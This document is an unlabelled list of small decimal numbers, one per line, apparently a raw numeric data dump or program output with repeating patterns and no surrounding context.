0.00331078
0.00330757
0.00331307
0.00331307
0.00330816
0.0033132
0.00330776
0.00330776
0.00326244
0.00326244
0.00325055
0.00325058
0.00325058
0.00325062
0.00326249
0.00325944
0.00326476
0.00326476
0.00325999
0.00326487
0.0032596
0.0032596
0.00321545
0.00321545
0.00320386
0.00320388
0.00320388
0.00320391
0.00321548
0.00321258
0.00321774
0.00321774
0.0032131
0.00321785
0.00321272
0.00321272
0.00316955
0.00316955
0.00315821
0.00315822
0.00315822
0.00315825
0.00316958
0.0031668
0.00317182
0.00317182
0.00316728
0.00317193
0.00316692
0.00316692
0.00312454
0.00312454
0.0031134
0.00311341
0.00311341
0.00311343
0.00312456
0.00312191
0.0031268
0.0031268
0.00312235
0.00312691
0.00312202
0.00312202
0.00308026
0.00308026
0.00306929
0.00306929
0.00306929
0.0030693
0.00308028
0.00307771
0.0030825
0.0030825
0.00307812
0.00308261
0.00307781
0.00307781
0.00303658
0.00303658
0.00302574
0.00302574
0.00302574
0.00302575
0.00303659
0.0030341
0.00303879
0.00303879
0.00303447
0.0030389
0.00303419
0.00303419
0.00299341
0.00299341
0.00298269
0.00298269
0.00298269
0.0029827
0.00299342
0.00299098
0.0029956
0.0029956
0.00299132
0.00299571
0.00299108
0.00299107
0.00295071
0.00295071
0.0029401
0.0029401
0.0029401
0.00294011
0.00295071
0.00294832
0.00295287
0.00295287
0.00294865
0.00295297
0.00294841
0.00294841
0.00290843
0.00290843
0.00289793
0.00289793
0.00289793
0.00289793
0.00290844
0.00290608
0.00291056
0.00291056
0.00290642
0.00291067
0.00290617
0.00290617
0.00286657
0.00286657
0.00285615
0.00285616
0.00285616
0.00285616
0.00286657
0.00286424
0.00286867
0.00286867
0.00286459
0.00286877
0.00286434
0.00286433
0.00282508
0.00282508
0.00281476
0.00281476
0.00281476
0.00281476
0.00282508
0.00282278
0.00282716
0.00282716
0.00282314
0.00282725
0.00282288
0.00282288
0.00278394
0.00278394
0.00277371
0.00277371
0.00277371
0.00277371
0.00278394
0.00278167
0.002786
0.002786
0.00278203
0.00278609
0.00278178
0.00278177
0.00274314
0.00274314
0.00273298
0.00273299
0.00273299
0.00273299
0.00274314
0.00274089
0.00274518
0.00274518
0.00274126
0.00274527
0.002741
0.002741
0.00270264
0.00270264
0.00269256
0.00269257
0.00269257
0.00269257
0.00270264
0.00270042
0.00270467
0.00270468
0.0027008
0.00270476
0.00270054
0.00270053
0.00266244
0.00266244
0.00265243
0.00265243
0.00265243
0.00265243
0.00266244
0.00266023
0.00266445
0.00266445
0.00266062
0.00266454
0.00266035
0.00266035
0.00359654
0.0035907
0.00358344
0.00358345
0.00359334
0.00359335
0.00358527
0.00359653
0.0035907
0.00358344
0.00358344
0.00359334
0.00359333
0.00358526
0.00359657
0.00359071
0.00358346
0.00358346
0.00359335
0.00359335
0.00358531
0.00359654
0.0035907
0.00358345
0.00358344
0.00358528
0.00359333
0.00359333
0.00355749
0.00357055
0.00357055
0.00356351
0.00356879
0.00356088
0.00356088
0.00353002
0.00352936
0.00352457
0.00352458
0.00352979
0.00352979
0.00352443
0.00355749
0.00357055
0.00357055
0.0035635
0.00356088
0.00356879
0.00356087
0.00353002
0.00352935
0.00352457
0.00352457
0.00352978
0.00352978
0.00352443
0.00355748
0.00357055
0.00357055
0.00356351
0.00356088
0.00356879
0.00356088
0.00353002
0.00352936
0.00352457
0.00352457
0.00352979
0.00352979
0.00352443
0.00353002
0.00352936
0.00352457
0.00352457
0.00352443
0.00352979
0.00352979
0.00351193
0.00351749
0.0035175
0.00351221
0.00351781
0.00351205
0.00351206
0.00347939
0.00347872
0.00347348
0.00347348
0.00347912
0.00347912
0.00347331
0.00351193
0.00351749
0.0035175
0.00351221
0.00351206
0.00351781
0.00351205
0.00347939
0.00347871
0.00347348
0.00347348
0.00347912
0.00347912
0.00347331
0.00351193
0.00351749
0.0035175
0.00351221
0.00351206
0.0035178
0.00351205
0.00347939
0.00347872
0.00347348
0.00347348
0.00347912
0.00347912
0.00347331
0.00347939
0.00347872
0.00347348
0.00347349
0.00347332
0.00347912
0.00347912
0.00346026
0.00346611
0.00346611
0.00346075
0.00346635
0.00346044
0.00346045
0.00342718
0.00342668
0.00342135
0.00342135
0.00342699
0.00342699
0.00342113
0.00346026
0.00346611
0.00346611
0.00346075
0.00346045
0.00346635
0.00346044
0.00342718
0.00342668
0.00342134
0.00342135
0.00342699
0.00342699
0.00342113
0.00346026
0.00346611
0.00346611
0.00346075
0.00346045
0.00346635
0.00346044
0.00342718
0.00342668
0.00342134
0.00342135
0.00342699
0.00342699
0.00342113
0.00342718
0.00342668
0.00342135
0.00342135
0.00342114
0.00342699
0.003427
0.00340818
0.00341402
0.00341402
0.00340878
0.00341419
0.00340839
0.0034084
0.00337565
0.00337525
0.00336998
0.00336998
0.00337551
0.00337551
0.00336977
0.00340818
0.00341402
0.00341402
0.00340878
0.0034084
0.00341419
0.00340839
0.00337565
0.00337525
0.00336998
0.00336998
0.00337551
0.00337551
0.00336977
0.00340818
0.00341402
0.00341402
0.00340878
0.0034084
0.00341419
0.00340839
0.00337565
0.00337525
0.00336998
0.00336998
0.00337551
0.00337551
0.00336977
0.00337565
0.00337525
0.00336998
0.00336998
0.00336977
0.00337551
0.00337551
0.00335715
0.00336284
0.00336284
0.00335776
0.00336297
0.00335735
0.00335735
0.0033255
0.00332514
0.00332002
0.00332002
0.00332538
0.00332538
0.00331982
0.00335715
0.00336284
0.00336284
0.00335776
0.00335735
0.00336298
0.00335735
0.0033255
0.00332514
0.00332002
0.00332002
0.00332538
0.00332538
0.00331983
0.00335715
0.00336284
0.00336284
0.00335776
0.00335735
0.00336298
0.00335735
0.0033255
0.00332514
0.00332001
0.00332002
0.00332538
0.00332538
0.00331982
0.0033255
0.00332514
0.00332002
0.00332002
0.00331982
0.00332538
0.00332538
0.00330757
0.00331307
0.00331307
0.00330816
0.0033132
0.00330776
0.00330776
0.00327683
0.00327648
0.00327151
0.00327151
0.00327671
0.00327671
0.00327134
0.00330757
0.00331307
0.00331307
0.00330816
0.00330776
0.0033132
0.00330776
0.00327682
0.00327648
0.00327151
0.00327151
0.0032767
0.00327671
0.00327134
0.00330757
0.00331307
0.00331307
0.00330816
0.00330776
0.0033132
0.00330775
0.00327682
0.00327648
0.00327151
0.00327151
0.0032767
0.00327671
0.00327134
0.00327683
0.00327648
0.00327151
0.00327151
0.00327134
0.00327671
0.00327671
0.00325944
0.00326475
0.00326476
0.00325999
0.00326487
0.0032596
0.0032596
0.0032295
0.00322917
0.00322433
0.00322433
0.00322938
0.00322938
0.00322419
0.00325944
0.00326475
0.00326475
0.00325999
0.0032596
0.00326487
0.0032596
0.0032295
0.00322917
0.00322433
0.00322433
0.00322938
0.00322938
0.00322419
0.00325944
0.00326475
0.00326475
0.00325999
0.0032596
0.00326487
0.0032596
0.0032295
0.00322917
0.00322433
0.00322433
0.00322938
0.00322938
0.00322419
0.0032295
0.00322917
0.00322433
0.00322433
0.00322419
0.00322938
0.00322938
0.00321258
0.00321774
0.00321774
0.0032131
0.00321785
0.00321272
0.00321272
0.00318332
0.00318301
0.00317829
0.00317829
0.00318321
0.00318321
0.00317816
0.00321258
0.00321774
0.00321774
0.0032131
0.00321272
0.00321785
0.00321272
0.00318332
0.00318301
0.00317829
0.00317829
0.00318321
0.00318321
0.00317816
0.00321258
0.00321774
0.00321774
0.0032131
0.00321272
0.00321785
0.00321272
0.00318332
0.00318301
0.00317829
0.00317829
0.00318321
0.00318321
0.00317816
0.00318332
0.00318301
0.00317828
0.00317828
0.00317816
0.00318321
0.00318321
0.00316681
0.00317182
0.00317182
0.00316729
0.00317193
0.00316693
0.00316693
0.0031381
0.00313779
0.00313318
0.00313318
0.00313799
0.00313798
0.00313306
0.00316681
0.00317182
0.00317182
0.00316729
0.00316693
0.00317193
0.00316693
0.0031381
0.00313779
0.00313318
0.00313318
0.00313799
0.00313798
0.00313306
0.00316681
0.00317182
0.00317182
0.00316729
0.00316693
0.00317193
0.00316693
0.00313809
0.00313779
0.00313318
0.00313317
0.00313799
0.00313798
0.00313306
0.00313809
0.00313778
0.00313317
0.00313317
0.00313306
0.00313798
0.00313798
0.00312191
0.0031268
0.0031268
0.00312235
0.00312691
0.00312203
0.00312202
0.00309363
0.00309332
0.00308881
0.00308881
0.00309352
0.00309352
0.00308871
0.00312191
0.0031268
0.0031268
0.00312235
0.00312202
0.00312691
0.00312203
0.00309363
0.00309332
0.00308881
0.00308881
0.00309352
0.00309352
0.00308871
0.00312191
0.0031268
0.0031268
0.00312235
0.00312202
0.00312691
0.00312203
0.00309363
0.00309332
0.00308881
0.00308881
0.00309352
0.00309352
0.00308871
0.00309363
0.00309332
0.00308881
0.00308881
0.0030887
0.00309352
0.00309352
0.00307771
0.0030825
0.0030825
0.00307812
0.00308261
0.00307782
0.00307781
0.00304978
0.00304948
0.00304505
0.00304505
0.00304967
0.00304967
0.00304495
0.00307771
0.0030825
0.0030825
0.00307812
0.00307781
0.00308261
0.00307782
0.00304978
0.00304948
0.00304505
0.00304505
0.00304967
0.00304967
0.00304495
0.00307771
0.0030825
0.0030825
0.00307812
0.00307781
0.00308261
0.00307782
0.00304978
0.00304948
0.00304505
0.00304505
0.00304967
0.00304967
0.00304495
0.00304978
0.00304948
0.00304505
0.00304505
0.00304495
0.00304967
0.00304967
0.0030341
0.00303879
0.00303879
0.00303447
0.0030389
0.00303419
0.00303419
0.00300646
0.00300617
0.00300181
0.00300181
0.00300635
0.00300636
0.00300172
0.0030341
0.00303879
0.00303879
0.00303447
0.00303419
0.0030389
0.00303419
0.00300646
0.00300617
0.00300181
0.00300181
0.00300635
0.00300635
0.00300172
0.0030341
0.00303879
0.00303879
0.00303447
0.00303419
0.0030389
0.00303419
0.00300646
0.00300617
0.00300181
0.00300181
0.00300635
0.00300636
0.00300172
0.00300646
0.00300617
0.00300181
0.00300181
0.00300172
0.00300635
0.00300636
0.00299098
0.0029956
0.0029956
0.00299133
0.00299571
0.00299108
0.00299108
0.00296362
0.00296333
0.00295904
0.00295904
0.00296351
0.00296351
0.00295895
0.00299099
0.0029956
0.0029956
0.00299132
0.00299108
0.00299571
0.00299108
0.00296362
0.00296333
0.00295904
0.00295904
0.00296351
0.00296351
0.00295895
0.00299099
0.0029956
0.0029956
0.00299133
0.00299108
0.00299571
0.00299108
0.00296362
0.00296333
0.00295904
0.00295904
0.00296351
0.00296351
0.00295895
0.00296362
0.00296333
0.00295904
0.00295904
0.00295895
0.00296351
0.00296351
0.00294832
0.00295287
0.00295287
0.00294865
0.00295297
0.00294842
0.00294841
0.00292121
0.00292094
0.0029167
0.0029167
0.0029211
0.0029211
0.00291661
0.00294832
0.00295287
0.00295287
0.00294865
0.00294841
0.00295297
0.00294842
0.00292121
0.00292094
0.0029167
0.00291669
0.0029211
0.0029211
0.00291661
0.00294832
0.00295287
0.00295287
0.00294865
0.00294841
0.00295297
0.00294842
0.00292121
0.00292094
0.0029167
0.00291669
0.0029211
0.0029211
0.00291661
0.00292121
0.00292094
0.0029167
0.00291669
0.00291661
0.0029211
0.0029211
0.00290609
0.00291057
0.00291057
0.00290642
0.00291067
0.00290618
0.00290617
0.00287921
0.00287895
0.00287476
0.00287476
0.00287911
0.00287911
0.00287467
0.00290609
0.00291057
0.00291056
0.00290643
0.00290617
0.00291067
0.00290618
0.00287921
0.00287895
0.00287476
0.00287476
0.00287911
0.00287911
0.00287467
0.00290608
0.00291057
0.00291056
0.00290642
0.00290617
0.00291067
0.00290618
0.00287921
0.00287895
0.00287476
0.00287476
0.00287911
0.00287911
0.00287467
0.00287921
0.00287895
0.00287476
0.00287476
0.00287467
0.00287911
0.00287911
0.00286425
0.00286867
0.00286867
0.00286459
0.00286877
0.00286434
0.00286434
0.0028376
0.00283735
0.00283321
0.00283321
0.0028375
0.0028375
0.00283311
0.00286424
0.00286867
0.00286867
0.00286459
0.00286433
0.00286877
0.00286434
0.0028376
0.00283735
0.00283321
0.00283321
0.0028375
0.0028375
0.00283311
0.00286424
0.00286867
0.00286867
0.00286459
0.00286434
0.00286877
0.00286434
0.0028376
0.00283735
0.00283321
0.00283321
0.0028375
0.0028375
0.00283311
0.0028376
0.00283735
0.00283321
0.00283321
0.00283311
0.0028375
0.0028375
0.00282278
0.00282716
0.00282716
0.00282314
0.00282725
0.00282288
0.00282288
0.00279635
0.00279611
0.00279202
0.00279202
0.00279626
0.00279626
0.00279192
0.00282278
0.00282716
0.00282716
0.00282314
0.00282288
0.00282725
0.00282288
0.00279635
0.00279611
0.00279202
0.00279202
0.00279626
0.00279626
0.00279192
0.00282278
0.00282716
0.00282716
0.00282314
0.00282288
0.00282725
0.00282288
0.00279635
0.00279611
0.00279202
0.00279202
0.00279626
0.00279626
0.00279192
0.00279635
0.00279611
0.00279202
0.00279202
0.00279191
0.00279626
0.00279626
0.00278167
0.002786
0.002786
0.00278204
0.0027861
0.00278178
0.00278178
0.00275545
0.00275522
0.00275117
0.00275117
0.00275536
0.00275536
0.00275106
0.00278167
0.002786
0.002786
0.00278203
0.00278178
0.00278609
0.00278178
0.00275545
0.00275522
0.00275117
0.00275117
0.00275536
0.00275536
0.00275106
0.00278167
0.002786
0.002786
0.00278203
0.00278178
0.00278609
0.00278178
0.00275545
0.00275522
0.00275117
0.00275117
0.00275536
0.00275536
0.00275106
0.00275545
0.00275522
0.00275117
0.00275117
0.00275105
0.00275536
0.00275536
0.00274089
0.00274519
0.00274519
0.00274126
0.00274527
0.00274101
0.00274101
0.00271486
0.00271463
0.00271063
0.00271062
0.00271478
0.00271477
0.00271051
0.00274089
0.00274518
0.00274518
0.00274126
0.002741
0.00274527
0.002741
0.00271486
0.00271463
0.00271062
0.00271062
0.00271477
0.00271477
0.0027105
0.00274089
0.00274519
0.00274519
0.00274126
0.002741
0.00274527
0.00274101
0.00271486
0.00271463
0.00271063
0.00271063
0.00271478
0.00271478
0.00271051
0.00271486
0.00271463
0.00271063
0.00271062
0.00271051
0.00271478
0.00271478
0.00270042
0.00270467
0.00270468
0.0027008
0.00270476
0.00270054
0.00270054
0.00267457
0.00267434
0.00267037
0.00267037
0.00267448
0.00267448
0.00267025
0.00270042
0.00270467
0.00270467
0.0027008
0.00270053
0.00270476
0.00270054
0.00267457
0.00267435
0.00267037
0.00267037
0.00267448
0.00267448
0.00267025
0.00270042
0.00270468
0.00270468
0.0027008
0.00270054
0.00270476
0.00270054
0.00267457
0.00267435
0.00267037
0.00267037
0.00267448
0.00267448
0.00267025
0.00267457
0.00267435
0.00267037
0.00267037
0.00267025
0.00267448
0.00267448
0.00266023
0.00266445
0.00266446
0.00266062
0.00266454
0.00266035
0.00266035
0.00266023
0.00266445
0.00266445
0.00266062
0.00266035
0.00266454
0.00266035
0.00266023
0.00266445
0.00266445
0.00266062
0.00266035
0.00266454
0.00266035
0.0036246
0.00362968
0.00363534
0.00362668
0.00363133
0.0036282
0.00362374
0.00362457
0.00362966
0.00363529
0.00362665
0.0036313
0.00362816
0.00362372
0.00356782
0.00356782
0.00355337
0.00356719
0.00355358
0.00355358
0.00355366
0.00356783
0.00356783
0.00355338
0.00356719
0.00355358
0.00355358
0.00355366
0.00356783
0.00356783
0.00355338
0.00356719
0.00355358
0.00355358
0.00355366
0.00353973
0.00352707
0.00352707
0.00353986
0.00353986
0.00354006
0.00352716
0.00353973
0.00352706
0.00352706
0.00353986
0.00353986
0.00354006
0.00352716
0.00353973
0.00352706
0.00352706
0.00353986
0.00353985
0.00354006
0.00352716
0.00353973
0.00352706
0.00352706
0.00353986
0.00353985
0.00354006
0.00352716
0.00355443
0.00355355
0.00354875
0.00354978
0.00355325
0.00355486
0.00354968
0.00356086
0.00357013
0.00356998
0.00355533
0.00357126
0.00355941
0.00355577
0.00356202
0.0035604
0.00356944
0.0035711
0.0035708
0.00355853
0.00356302
0.00355344
0.00354781
0.00355328
0.00354868
0.00355285
0.00355148
0.00354906
0.00355442
0.00355354
0.00354978
0.00354875
0.00355486
0.00355324
0.00354968
0.00356086
0.00357014
0.00356998
0.00355532
0.00357126
0.00355941
0.00355577
0.00356202
0.00356039
0.0035711
0.00356943
0.0035708
0.00356302
0.00355852
0.00355344
0.00354781
0.00355328
0.00354868
0.00355285
0.00355148
0.00354906
0.00355265
0.00355423
0.00354922
0.00354922
0.00355353
0.00355352
0.0035486
0.00351462
0.00351462
0.00350207
0.00350206
0.00350206
0.00350208
0.00351466
0.00351462
0.00351462
0.00350207
0.00350206
0.00350206
0.00350208
0.00351466
0.00351462
0.00351462
0.00350207
0.00350206
0.00350206
0.00350208
0.00351466
0.00348928
0.00347636
0.00347636
0.00348928
0.00348928
0.0034893
0.00347638
0.00348928
0.00347636
0.00347636
0.00348928
0.00348928
0.0034893
0.00347638
0.00348928
0.00347636
0.00347636
0.00348927
0.00348927
0.0034893
0.00347638
0.00348928
0.00347636
0.00347636
0.00348928
0.00348928
0.0034893
0.00347638
0.00350507
0.00350512
0.00349926
0.00349959
0.00350529
0.00350506
0.00349958
0.00351212
0.00351757
0.00351749
0.00351235
0.00351758
0.00351198
0.00351155
0.0035123
0.00351177
0.00351791
0.0035177
0.00351772
0.00351196
0.0035123
0.00350497
0.00349892
0.00350569
0.0034993
0.00350497
0.00350495
0.00349943
0.00350507
0.00350512
0.00349958
0.00349926
0.00350506
0.00350529
0.00349958
0.00351212
0.00351757
0.00351749
0.00351235
0.00351758
0.00351198
0.00351155
0.0035123
0.00351177
0.0035177
0.0035179
0.00351771
0.0035123
0.00351196
0.00350497
0.00349892
0.00350569
0.0034993
0.00350497
0.00350495
0.00349943
0.00350518
0.0035044
0.00349934
0.00349935
0.00350487
0.00350487
0.00349922
0.0034634
0.0034634
0.00345039
0.00345041
0.00345041
0.00345043
0.00346341
0.0034634
0.0034634
0.00345039
0.00345041
0.00345041
0.00345043
0.00346341
0.0034634
0.0034634
0.00345039
0.00345041
0.00345041
0.00345043
0.00346341
0.0034374
0.00342445
0.00342445
0.00343742
0.00343742
0.00343745
0.00342448
0.0034374
0.00342445
0.00342445
0.00343742
0.00343742
0.00343745
0.00342448
0.0034374
0.00342445
0.00342445
0.00343742
0.00343742
0.00343745
0.00342448
0.0034374
0.00342445
0.00342445
0.00343742
0.00343742
0.00343745
0.00342448
0.00345326
0.0034534
0.00344727
0.00344766
0.00345344
0.00345327
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346622
0.00346041
0.00346012
0.00346069
0.00346029
0.0034665
0.00346632
0.0034663
0.00346034
0.00346071
0.00345317
0.00344709
0.00345362
0.00344735
0.00345316
0.00345326
0.0034475
0.00345325
0.00345339
0.00344766
0.00344727
0.00345327
0.00345344
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346622
0.00346041
0.00346012
0.00346069
0.00346029
0.00346631
0.0034665
0.0034663
0.00346071
0.00346034
0.00345317
0.00344709
0.00345362
0.00344735
0.00345316
0.00345326
0.0034475
0.00345328
0.00345271
0.00344739
0.00344739
0.00345306
0.00345306
0.0034472
0.00341152
0.00341152
0.0033986
0.00339864
0.00339864
0.00339868
0.00341155
0.00341152
0.00341152
0.0033986
0.00339864
0.00339864
0.00339868
0.00341155
0.00341152
0.00341152
0.0033986
0.00339864
0.00339864
0.00339868
0.00341155
0.00338579
0.0033731
0.0033731
0.00338583
0.00338583
0.00338587
0.00337314
0.00338579
0.0033731
0.0033731
0.00338583
0.00338583
0.00338587
0.00337314
0.00338579
0.0033731
0.0033731
0.00338583
0.00338583
0.00338587
0.00337314
0.00338579
0.0033731
0.0033731
0.00338583
0.00338583
0.00338587
0.00337314
0.00340128
0.00340142
0.00339536
0.00339578
0.00340142
0.00340131
0.00339574
0.0034085
0.00341411
0.00341424
0.00340832
0.00341412
0.00340835
0.00340814
0.00340863
0.00340825
0.00341435
0.00341423
0.0034142
0.00340826
0.00340867
0.00340121
0.00339527
0.0034015
0.00339547
0.00340119
0.00340133
0.00339562
0.00340128
0.00340142
0.00339578
0.00339536
0.00340131
0.00340142
0.00339574
0.0034085
0.00341411
0.00341424
0.00340831
0.00341412
0.00340835
0.00340814
0.00340863
0.00340825
0.00341423
0.00341435
0.0034142
0.00340867
0.00340825
0.00340121
0.00339527
0.0034015
0.00339547
0.00340119
0.00340133
0.00339562
0.00340127
0.00340082
0.00339551
0.00339552
0.00340111
0.00340111
0.0033953
0.00336044
0.00336044
0.00334784
0.00334788
0.00334788
0.00334793
0.00336049
0.00336044
0.00336044
0.00334784
0.00334788
0.00334788
0.00334793
0.00336049
0.00336044
0.00336044
0.00334784
0.00334788
0.00334788
0.00334793
0.00336049
0.00333536
0.00332302
0.00332302
0.00333541
0.00333541
0.00333546
0.00332307
0.00333536
0.00332302
0.00332302
0.00333541
0.00333541
0.00333546
0.00332307
0.00333536
0.00332302
0.00332302
0.00333541
0.00333541
0.00333546
0.00332307
0.00333536
0.00332302
0.00332302
0.00333541
0.00333541
0.00333546
0.00332307
0.00335039
0.00335052
0.00334464
0.00334504
0.00335051
0.00335042
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00336293
0.0033573
0.00335715
0.00335756
0.0033572
0.0033631
0.00336301
0.00336299
0.00335719
0.00335759
0.00335034
0.00334462
0.00335055
0.00334476
0.00335032
0.00335049
0.00334491
0.00335039
0.00335052
0.00334504
0.00334464
0.00335042
0.00335051
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00336293
0.0033573
0.00335715
0.00335756
0.0033572
0.00336301
0.0033631
0.00336299
0.00335759
0.00335719
0.00335034
0.00334462
0.00335055
0.00334476
0.00335032
0.00335049
0.00334491
0.00335039
0.00335001
0.00334481
0.00334481
0.00335026
0.00335026
0.00334461
0.00331073
0.00331073
0.00329849
0.00329853
0.00329853
0.00329858
0.00331078
0.00331073
0.00331073
0.00329849
0.00329853
0.00329853
0.00329858
0.00331078
0.00331073
0.00331073
0.00329849
0.00329853
0.00329853
0.00329858
0.00331078
0.00328638
0.00327439
0.00327439
0.00328641
0.00328641
0.00328646
0.00327443
0.00328638
0.00327439
0.00327439
0.00328641
0.00328641
0.00328646
0.00327443
0.00328638
0.00327439
0.00327439
0.00328641
0.00328641
0.00328646
0.00327443
0.00328638
0.00327439
0.00327439
0.00328641
0.00328641
0.00328646
0.00327443
0.00330096
0.00330108
0.0032954
0.00329577
0.00330107
0.00330098
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00331315
0.00330769
0.00330758
0.00330792
0.00330758
0.00331329
0.0033132
0.00331318
0.00330757
0.00330795
0.00330093
0.00329541
0.00330109
0.00329552
0.00330091
0.00330109
0.00329567
0.00330096
0.00330108
0.00329576
0.0032954
0.00330098
0.00330106
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00331315
0.00330769
0.00330757
0.00330792
0.00330758
0.0033132
0.00331329
0.00331318
0.00330794
0.00330757
0.00330093
0.00329541
0.00330109
0.00329552
0.00330091
0.00330109
0.00329567
0.00330098
0.00330063
0.00329559
0.00329559
0.00330086
0.00330086
0.00329541
0.00326244
0.00326244
0.00325055
0.00325058
0.00325058
0.00325062
0.00326249
0.00326244
0.00326244
0.00325055
0.00325058
0.00325058
0.00325062
0.00326249
0.00326244
0.00326244
0.00325055
0.00325058
0.00325058
0.00325062
0.00326249
0.00323877
0.00322709
0.00322709
0.0032388
0.0032388
0.00323884
0.00322712
0.00323877
0.00322709
0.00322709
0.0032388
0.0032388
0.00323884
0.00322712
0.00323877
0.00322709
0.00322709
0.0032388
0.0032388
0.00323884
0.00322712
0.00323877
0.00322709
0.00322709
0.0032388
0.0032388
0.00323884
0.00322712
0.00325296
0.00325307
0.00324758
0.00324791
0.00325307
0.00325297
0.00324789
0.00325968
0.0032648
0.00326498
0.00325941
0.00326482
0.00325952
0.00325944
0.00325973
0.00325941
0.00326494
0.00326485
0.00326483
0.00325941
0.00325975
0.00325295
0.00324761
0.00325308
0.00324769
0.00325293
0.00325311
0.00324784
0.00325295
0.00325307
0.00324791
0.00324758
0.00325297
0.00325306
0.00324789
0.00325967
0.0032648
0.00326497
0.0032594
0.00326482
0.00325952
0.00325944
0.00325973
0.00325941
0.00326485
0.00326494
0.00326483
0.00325975
0.00325941
0.00325295
0.00324761
0.00325308
0.00324769
0.00325293
0.0032531
0.00324784
0.003253
0.00325267
0.00324777
0.00324777
0.00325289
0.00325289
0.00324761
0.00321545
0.00321545
0.00320386
0.00320388
0.00320388
0.00320391
0.00321548
0.00321545
0.00321545
0.00320386
0.00320388
0.00320388
0.00320391
0.00321548
0.00321545
0.00321545
0.00320386
0.00320388
0.00320388
0.00320391
0.00321548
0.00319236
0.00318093
0.00318093
0.00319238
0.00319238
0.00319241
0.00318096
0.00319236
0.00318093
0.00318093
0.00319238
0.00319238
0.00319241
0.00318096
0.00319236
0.00318093
0.00318093
0.00319238
0.00319238
0.00319241
0.00318096
0.00319236
0.00318093
0.00318093
0.00319238
0.00319238
0.00319241
0.00318096
0.00320622
0.00320633
0.003201
0.0032013
0.00320633
0.00320623
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.0032178
0.00321264
0.00321258
0.00321283
0.00321254
0.00321791
0.00321781
0.00321779
0.00321254
0.00321284
0.00320622
0.00320104
0.00320634
0.0032011
0.00320621
0.00320638
0.00320125
0.00320622
0.00320633
0.00320129
0.003201
0.00320623
0.00320633
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.0032178
0.00321264
0.00321258
0.00321283
0.00321254
0.0032178
0.00321791
0.00321779
0.00321284
0.00321254
0.00320622
0.00320104
0.00320634
0.00320109
0.00320621
0.00320638
0.00320125
0.00320628
0.00320596
0.00320118
0.00320118
0.00320616
0.00320616
0.00320105
0.00316955
0.00316955
0.00315821
0.00315822
0.00315822
0.00315825
0.00316958
0.00316955
0.00316955
0.00315821
0.00315822
0.00315822
0.00315825
0.00316958
0.00316955
0.00316955
0.00315821
0.00315822
0.00315822
0.00315825
0.00316958
0.00314693
0.00313572
0.00313572
0.00314695
0.00314695
0.00314697
0.00313574
0.00314693
0.00313572
0.00313572
0.00314695
0.00314695
0.00314697
0.00313574
0.00314693
0.00313572
0.00313572
0.00314695
0.00314695
0.00314697
0.00313574
0.00314693
0.00313572
0.00313572
0.00314695
0.00314695
0.00314697
0.00313574
0.00316053
0.00316064
0.00315546
0.00315571
0.00316065
0.00316054
0.0031557
0.00316699
0.00317186
0.00317203
0.00316674
0.00317187
0.00316683
0.00316679
0.00316701
0.00316674
0.00317199
0.00317187
0.00317186
0.00316676
0.00316702
0.00316054
0.00315549
0.00316065
0.00315553
0.00316053
0.00316069
0.00315568
0.00316053
0.00316065
0.00315571
0.00315546
0.00316054
0.00316065
0.0031557
0.00316698
0.00317186
0.00317203
0.00316673
0.00317187
0.00316683
0.00316679
0.00316701
0.00316674
0.00317187
0.00317199
0.00317186
0.00316702
0.00316676
0.00316054
0.00315549
0.00316065
0.00315552
0.00316053
0.00316069
0.00315568
0.0031606
0.00316029
0.00315562
0.00315562
0.00316049
0.00316049
0.0031555
0.00312454
0.00312454
0.0031134
0.00311341
0.00311341
0.00311343
0.00312456
0.00312454
0.00312454
0.0031134
0.00311341
0.00311341
0.00311343
0.00312456
0.00312454
0.00312454
0.0031134
0.00311341
0.00311341
0.00311343
0.00312456
0.00310231
0.00309127
0.00309127
0.00310232
0.00310232
0.00310234
0.00309129
0.00310231
0.00309127
0.00309127
0.00310232
0.00310232
0.00310234
0.00309129
0.00310231
0.00309127
0.00309127
0.00310232
0.00310232
0.00310234
0.00309129
0.00310231
0.00309127
0.00309127
0.00310232
0.00310232
0.00310234
0.00309129
0.0031157
0.00311581
0.00311074
0.00311097
0.00311583
0.0031157
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.00312685
0.0031219
0.00312187
0.00312208
0.00312183
0.00312696
0.00312684
0.00312683
0.00312185
0.00312208
0.00311571
0.00311076
0.00311582
0.00311078
0.0031157
0.00311586
0.00311094
0.0031157
0.00311581
0.00311097
0.00311074
0.0031157
0.00311583
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.00312685
0.0031219
0.00312187
0.00312208
0.00312183
0.00312684
0.00312697
0.00312683
0.00312208
0.00312185
0.00311571
0.00311076
0.00311582
0.00311078
0.0031157
0.00311586
0.00311094
0.00311578
0.00311547
0.00311091
0.00311091
0.00311566
0.00311566
0.0031108
0.00308026
0.00308026
0.00306929
0.00306929
0.00306929
0.0030693
0.00308028
0.00308026
0.00308026
0.00306929
0.00306929
0.00306929
0.0030693
0.00308028
0.00308026
0.00308026
0.00306929
0.00306929
0.00306929
0.0030693
0.00308028
0.00305835
0.00304745
0.00304745
0.00305835
0.00305835
0.00305837
0.00304746
0.00305835
0.00304745
0.00304745
0.00305835
0.00305835
0.00305837
0.00304746
0.00305835
0.00304745
0.00304745
0.00305835
0.00305835
0.00305837
0.00304746
0.00305835
0.00304745
0.00304745
0.00305835
0.00305835
0.00305837
0.00304746
0.00307155
0.00307168
0.00306669
0.0030669
0.00307169
0.00307156
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00308254
0.00307767
0.00307766
0.00307785
0.00307763
0.00308267
0.00308253
0.00308253
0.00307765
0.00307786
0.00307156
0.0030667
0.00307168
0.00306671
0.00307156
0.00307171
0.00306687
0.00307155
0.00307168
0.0030669
0.00306669
0.00307156
0.00307169
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00308254
0.00307767
0.00307766
0.00307785
0.00307763
0.00308253
0.00308267
0.00308253
0.00307786
0.00307765
0.00307156
0.0030667
0.00307168
0.00306671
0.00307156
0.00307171
0.00306687
0.00307163
0.00307133
0.00306686
0.00306686
0.00307152
0.00307152
0.00306676
0.00303658
0.00303658
0.00302574
0.00302574
0.00302574
0.00302575
0.00303659
0.00303658
0.00303658
0.00302574
